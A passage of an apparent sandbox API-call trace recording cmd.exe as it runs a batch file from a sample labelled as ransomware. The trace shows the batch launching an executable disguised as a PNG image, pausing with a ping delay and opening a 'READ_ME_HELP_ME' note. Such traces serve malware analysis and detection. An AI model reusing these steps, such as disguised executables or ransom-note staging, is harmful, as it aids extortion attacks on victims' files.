lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0037.231] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0037.231] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\Chinese_national_flag.png", fInfoLevelId=0x1, lpFindFileData=0xc72388, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc72388) returned 0xd271b0 [0037.231] FindClose (in: hFindFile=0xd271b0 | out: hFindFile=0xd271b0) returned 1 [0037.231] GetStartupInfoW (in: lpStartupInfo=0xc728e8 | out: lpStartupInfo=0xc728e8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\SYSTEM32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0037.231] InitializeProcThreadAttributeList (in: lpAttributeList=0x0, dwAttributeCount=0x2, dwFlags=0x0, lpSize=0xc72878 | out: lpAttributeList=0x0, lpSize=0xc72878) returned 0 [0037.231] GetLastError () returned 0x7a [0037.231] InitializeProcThreadAttributeList (in: lpAttributeList=0xd26238, dwAttributeCount=0x2, dwFlags=0x0, lpSize=0xc72878 | out: lpAttributeList=0xd26238, lpSize=0xc72878) returned 1 [0037.231] UpdateProcThreadAttribute (in: lpAttributeList=0xd26238, dwFlags=0x0, Attribute=0x60001, lpValue=0xc7289c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xd26238, lpPreviousValue=0x0) returned 1 [0037.231] CreateProcessW (in: lpApplicationName="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\Chinese_national_flag.png", lpCommandLine="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\Chinese_national_flag.png ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80410, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0xc728a0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x24, hStdOutput=0x28, hStdError=0x2c), lpProcessInformation=0xc7288c | out: lpCommandLine="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\Chinese_national_flag.png ", lpProcessInformation=0xc7288c*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0037.232] DeleteProcThreadAttributeList (in: lpAttributeList=0xd26238 | out: lpAttributeList=0xd26238) [0037.232] LdrResolveDelayLoadedAPI () returned 0x74821165 [0037.232] ShellExecuteWorker () returned 0x1 [0038.481] _get_osfhandle (_FileHandle=1) returned 0x28 [0038.481] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0038.482] _get_osfhandle (_FileHandle=1) returned 0x28 [0038.482] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0038.482] _get_osfhandle (_FileHandle=0) returned 0x24 [0038.482] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0038.482] SetConsoleInputExeNameW () returned 0x1 [0038.483] GetConsoleOutputCP () returned 0x1b5 [0038.483] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0038.483] SetThreadUILanguage (LangId=0x0) returned 0x409 [0038.483] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0038.483] _open_osfhandle (_OSFileHandle=0x14c, _Flags=8) returned 3 [0038.483] _get_osfhandle (_FileHandle=3) returned 0x14c [0038.483] SetFilePointer (in: hFile=0x14c, lDistanceToMove=2280, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0038.483] SetFilePointer (in: hFile=0x14c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0038.483] ReadFile (in: hFile=0x14c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0x186, lpOverlapped=0x0) returned 1 [0038.483] SetFilePointer (in: hFile=0x14c, lDistanceToMove=2302, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0038.483] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="ping -n 10 127.1>nul\r\ne_national_flag.png\r\n\\FRSRAMSOMWARE\\Chinese_national_flag.png\r\np\\FRS.exe\"\r\n") returned 22 [0038.483] GetFileType (hFile=0x14c) returned 0x1 [0038.483] _get_osfhandle (_FileHandle=3) returned 0x14c [0038.483] SetFilePointer (in: hFile=0x14c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0038.484] _tell (_FileHandle=3) returned 2302 [0038.484] _close (_FileHandle=3) returned 0 [0038.484] _wcsicmp (_String1="ping", _String2="DIR") returned 12 [0038.484] _wcsicmp (_String1="ping", _String2="ERASE") returned 11 [0038.484] _wcsicmp (_String1="ping", _String2="DEL") returned 12 [0038.484] _wcsicmp (_String1="ping", _String2="TYPE") returned -4 [0038.484] _wcsicmp (_String1="ping", _String2="COPY") returned 13 [0038.484] _wcsicmp (_String1="ping", _String2="CD") returned 13 [0038.484] _wcsicmp (_String1="ping", _String2="CHDIR") returned 13 [0038.484] _wcsicmp (_String1="ping", _String2="RENAME") returned -2 [0038.484] _wcsicmp (_String1="ping", _String2="REN") returned -2 [0038.484] _wcsicmp (_String1="ping", _String2="ECHO") returned 11 [0038.484] _wcsicmp (_String1="ping", _String2="SET") returned -3 [0038.484] _wcsicmp (_String1="ping", _String2="PAUSE") returned 8 [0038.484] _wcsicmp (_String1="ping", _String2="DATE") returned 12 [0038.484] _wcsicmp (_String1="ping", _String2="TIME") returned -4 [0038.484] _wcsicmp (_String1="ping", _String2="PROMPT") returned -9 [0038.484] _wcsicmp (_String1="ping", _String2="MD") returned 3 [0038.484] _wcsicmp (_String1="ping", _String2="MKDIR") returned 3 [0038.484] _wcsicmp (_String1="ping", _String2="RD") returned -2 [0038.484] _wcsicmp (_String1="ping", _String2="RMDIR") returned -2 [0038.484] _wcsicmp (_String1="ping", _String2="PATH") returned 8 [0038.484] _wcsicmp (_String1="ping", _String2="GOTO") returned 9 [0038.484] _wcsicmp (_String1="ping", _String2="SHIFT") returned -3 [0038.484] _wcsicmp (_String1="ping", _String2="CLS") returned 13 [0038.484] _wcsicmp (_String1="ping", _String2="CALL") returned 13 [0038.484] _wcsicmp (_String1="ping", _String2="VERIFY") returned -6 [0038.484] _wcsicmp (_String1="ping", _String2="VER") returned -6 [0038.484] _wcsicmp (_String1="ping", _String2="VOL") returned -6 [0038.484] _wcsicmp (_String1="ping", _String2="EXIT") returned 11 [0038.484] _wcsicmp (_String1="ping", _String2="SETLOCAL") returned -3 [0038.484] _wcsicmp (_String1="ping", _String2="ENDLOCAL") returned 11 [0038.484] _wcsicmp (_String1="ping", _String2="TITLE") returned -4 [0038.484] _wcsicmp (_String1="ping", _String2="START") returned -3 [0038.484] _wcsicmp (_String1="ping", _String2="DPATH") returned 12 [0038.484] _wcsicmp (_String1="ping", _String2="KEYS") returned 5 [0038.484] _wcsicmp (_String1="ping", _String2="MOVE") returned 3 [0038.485] _wcsicmp (_String1="ping", _String2="PUSHD") returned -12 [0038.485] _wcsicmp (_String1="ping", _String2="POPD") returned -6 [0038.485] _wcsicmp (_String1="ping", _String2="ASSOC") returned 15 [0038.485] _wcsicmp (_String1="ping", _String2="FTYPE") returned 10 [0038.485] _wcsicmp (_String1="ping", _String2="BREAK") returned 14 [0038.485] _wcsicmp (_String1="ping", _String2="COLOR") returned 13 [0038.485] _wcsicmp (_String1="ping", _String2="MKLINK") returned 3 [0038.485] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0038.485] SetErrorMode (uMode=0x0) returned 0x0 [0038.485] SetErrorMode (uMode=0x1) returned 0x0 [0038.485] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd673f0, lpFilePart=0xc8efcc | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8efcc*="Desktop") returned 0x1c [0038.485] SetErrorMode (uMode=0x0) returned 0x1 [0038.485] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0038.485] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0038.485] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0038.485] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0038.485] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xffffffff [0038.485] GetLastError () returned 0x2 [0038.485] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0038.485] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xd5a0b0 [0038.485] FindClose (in: hFindFile=0xd5a0b0 | out: hFindFile=0xd5a0b0) returned 1 [0038.485] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xffffffff [0038.486] GetLastError () returned 0x2 [0038.486] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xd59ff0 [0038.486] FindClose (in: hFindFile=0xd59ff0 | out: hFindFile=0xd59ff0) returned 1 [0038.486] GetFileType (hFile=0x28) returned 0x2 [0038.486] GetStdHandle (nStdHandle=0xfffffff5) returned 0x28 [0038.486] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xc8efb4 | out: lpMode=0xc8efb4) returned 1 [0038.486] _dup (_FileHandle=1) returned 3 [0038.486] _close (_FileHandle=1) returned 0 [0038.486] _wcsicmp (_String1="nul", _String2="con") returned 11 [0038.486] CreateFileW (lpFileName="nul" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0xc8ef94, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28 [0038.486] _open_osfhandle (_OSFileHandle=0x28, _Flags=8) returned 1 [0038.486] GetConsoleTitleW (in: lpConsoleTitle=0xc8edb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0038.486] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0038.486] SetErrorMode (uMode=0x0) returned 0x0 [0038.487] SetErrorMode (uMode=0x1) returned 0x0 [0038.487] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd67448, lpFilePart=0xc8e8b4 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8e8b4*="Desktop") returned 0x1c [0038.487] SetErrorMode (uMode=0x0) returned 0x1 [0038.487] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0038.487] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0038.487] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0038.487] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0038.487] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xffffffff [0038.487] GetLastError () returned 0x2 [0038.487] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0038.487] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xd59ff0 [0038.487] FindClose (in: hFindFile=0xd59ff0 | out: hFindFile=0xd59ff0) returned 1 [0038.487] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xffffffff [0038.487] GetLastError () returned 0x2 [0038.487] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xd59ff0 [0038.487] FindClose (in: hFindFile=0xd59ff0 | out: hFindFile=0xd59ff0) returned 1 [0038.488] GetConsoleTitleW (in: lpConsoleTitle=0xc8eb3c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0038.488] InitializeProcThreadAttributeList (in: lpAttributeList=0xc8ea68, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xc8ea4c | out: lpAttributeList=0xc8ea68, lpSize=0xc8ea4c) returned 1 [0038.488] UpdateProcThreadAttribute (in: lpAttributeList=0xc8ea68, dwFlags=0x0, Attribute=0x60001, lpValue=0xc8ea54, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xc8ea68, lpPreviousValue=0x0) returned 1 [0038.488] GetStartupInfoW (in: lpStartupInfo=0xc8eaa0 | out: lpStartupInfo=0xc8eaa0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\SYSTEM32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0038.488] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0038.488] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0038.488] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0038.488] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0038.488] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0038.488] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0038.488] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0038.488] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0038.488] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0038.488] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0038.488] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0038.488] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0038.488] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0038.488] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0038.488] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0038.488] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0038.488] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0038.488] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0038.488] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0038.488] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0038.488] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0038.488] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0038.488] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0038.488] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0038.488] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0038.488] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0038.488] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0038.488] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0038.488] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0038.488] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0038.489] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0038.489] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0038.489] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0038.489] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0038.489] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0038.489] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0038.489] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0038.489] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0038.489] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0038.489] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0038.489] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0038.489] lstrcmpW (lpString1="\\PING.EXE", lpString2="\\XCOPY.EXE") returned -1 [0038.489] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\PING.EXE", lpCommandLine="ping -n 10 127.1", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0xc8e9f0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ping -n 10 127.1", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xc8ea3c | out: lpCommandLine="ping -n 10 127.1", lpProcessInformation=0xc8ea3c*(hProcess=0x25c, hThread=0x154, dwProcessId=0x93c, dwThreadId=0x934)) returned 1 [0038.572] CloseHandle (hObject=0x154) returned 1 [0038.572] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0038.572] GetEnvironmentStringsW () returned 0xd2c668* [0038.572] FreeEnvironmentStringsA (penv="=") returned 1 [0038.572] WaitForSingleObject (hHandle=0x25c, dwMilliseconds=0xffffffff) returned 0x0 [0047.988] GetExitCodeProcess (in: hProcess=0x25c, lpExitCode=0xc8e9d4 | out: lpExitCode=0xc8e9d4*=0x0) returned 1 [0047.988] CloseHandle (hObject=0x25c) returned 1 [0047.988] _vsnwprintf (in: _Buffer=0xc8eabc, _BufferCount=0x13, _Format="%08X", _ArgList=0xc8e9dc | out: _Buffer="00000000") returned 8 [0047.988] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0047.988] GetEnvironmentStringsW () returned 0xd30508* [0047.988] FreeEnvironmentStringsA (penv="=") returned 1 [0047.988] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0047.988] GetEnvironmentStringsW () returned 0xd2c668* [0047.989] FreeEnvironmentStringsA (penv="=") returned 1 [0047.989] DeleteProcThreadAttributeList (in: lpAttributeList=0xc8ea68 | out: lpAttributeList=0xc8ea68) [0047.989] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0047.989] _close (_FileHandle=3) returned 0 [0047.989] _get_osfhandle (_FileHandle=1) returned 0x28 [0047.989] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0047.989] _get_osfhandle (_FileHandle=1) returned 0x28 [0047.989] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0047.989] _get_osfhandle (_FileHandle=0) returned 0x24 [0047.989] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0047.989] SetConsoleInputExeNameW () returned 0x1 [0047.989] GetConsoleOutputCP () returned 0x1b5 [0047.989] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0047.989] SetThreadUILanguage (LangId=0x0) returned 0x409 [0047.990] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0047.990] _open_osfhandle (_OSFileHandle=0x14c, _Flags=8) returned 3 [0047.990] _get_osfhandle (_FileHandle=3) returned 0x14c [0047.990] SetFilePointer (in: hFile=0x14c, lDistanceToMove=2302, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0047.990] SetFilePointer (in: hFile=0x14c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0047.990] ReadFile (in: hFile=0x14c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0x170, lpOverlapped=0x0) returned 1 [0047.990] SetFilePointer (in: hFile=0x14c, lDistanceToMove=2339, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0047.990] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="start %MYFILES%\\READ_ME_HELP_ME.txt\r\n.png\r\n\\FRSRAMSOMWARE\\Chinese_national_flag.png\r\np\\FRS.exe\"\r\n") returned 37 [0047.990] GetFileType (hFile=0x14c) returned 0x1 [0047.990] _get_osfhandle (_FileHandle=3) returned 0x14c [0047.990] SetFilePointer (in: hFile=0x14c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0047.991] GetEnvironmentVariableW (in: lpName="MYFILES", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F") returned 0x2f [0047.991] _tell (_FileHandle=3) returned 2339 [0047.991] _close (_FileHandle=3) returned 0 [0047.991] _wcsicmp (_String1="start", _String2="DIR") returned 15 [0047.991] _wcsicmp (_String1="start", _String2="ERASE") returned 14 [0047.991] _wcsicmp (_String1="start", _String2="DEL") returned 15 [0047.991] _wcsicmp (_String1="start", _String2="TYPE") returned -1 [0047.991] _wcsicmp (_String1="start", _String2="COPY") returned 16 [0047.991] _wcsicmp (_String1="start", _String2="CD") returned 16 [0047.991] _wcsicmp (_String1="start", _String2="CHDIR") returned 16 [0047.991] _wcsicmp (_String1="start", _String2="RENAME") returned 1 [0047.991] _wcsicmp (_String1="start", _String2="REN") returned 1 [0047.991] _wcsicmp (_String1="start", _String2="ECHO") returned 14 [0047.991] _wcsicmp (_String1="start", _String2="SET") returned 15 [0047.991] _wcsicmp (_String1="start", _String2="PAUSE") returned 3 [0047.991] _wcsicmp (_String1="start", _String2="DATE") returned 15 [0047.991] _wcsicmp (_String1="start", _String2="TIME") returned -1 [0047.991] _wcsicmp (_String1="start", _String2="PROMPT") returned 3 [0047.991] _wcsicmp (_String1="start", _String2="MD") returned 6 [0047.991] _wcsicmp (_String1="start", _String2="MKDIR") returned 6 [0047.991] _wcsicmp (_String1="start", _String2="RD") returned 1 [0047.991] _wcsicmp (_String1="start", _String2="RMDIR") returned 1 [0047.991] _wcsicmp (_String1="start", _String2="PATH") returned 3 [0047.991] _wcsicmp (_String1="start", _String2="GOTO") returned 12 [0047.991] _wcsicmp (_String1="start", _String2="SHIFT") returned 12 [0047.991] _wcsicmp (_String1="start", _String2="CLS") returned 16 [0047.991] _wcsicmp (_String1="start", _String2="CALL") returned 16 [0047.991] _wcsicmp (_String1="start", _String2="VERIFY") returned -3 [0047.991] _wcsicmp (_String1="start", _String2="VER") returned -3 [0047.991] _wcsicmp (_String1="start", _String2="VOL") returned -3 [0047.991] _wcsicmp (_String1="start", _String2="EXIT") returned 14 [0047.991] _wcsicmp (_String1="start", _String2="SETLOCAL") returned 15 [0047.991] _wcsicmp (_String1="start", _String2="ENDLOCAL") returned 14 [0047.991] _wcsicmp (_String1="start", _String2="TITLE") returned -1 [0047.991] _wcsicmp (_String1="start", _String2="START") returned 0 [0047.991] GetConsoleTitleW (in: lpConsoleTitle=0xc8edb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0047.992] GetStdHandle (nStdHandle=0xfffffff6) returned 0x24 [0047.992] GetStdHandle (nStdHandle=0xfffffff5) returned 0x28 [0047.992] GetStdHandle (nStdHandle=0xfffffff4) returned 0x2c [0047.992] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0047.992] SetErrorMode (uMode=0x0) returned 0x0 [0047.992] SetErrorMode (uMode=0x1) returned 0x0 [0047.992] GetFullPathNameW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\.", nBufferLength=0x208, lpBuffer=0xd65f60, lpFilePart=0xc725dc | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F", lpFilePart=0xc725dc*="qb1143663.0F") returned 0x2f [0047.992] SetErrorMode (uMode=0x0) returned 0x1 [0047.992] NeedCurrentDirectoryForExePathW 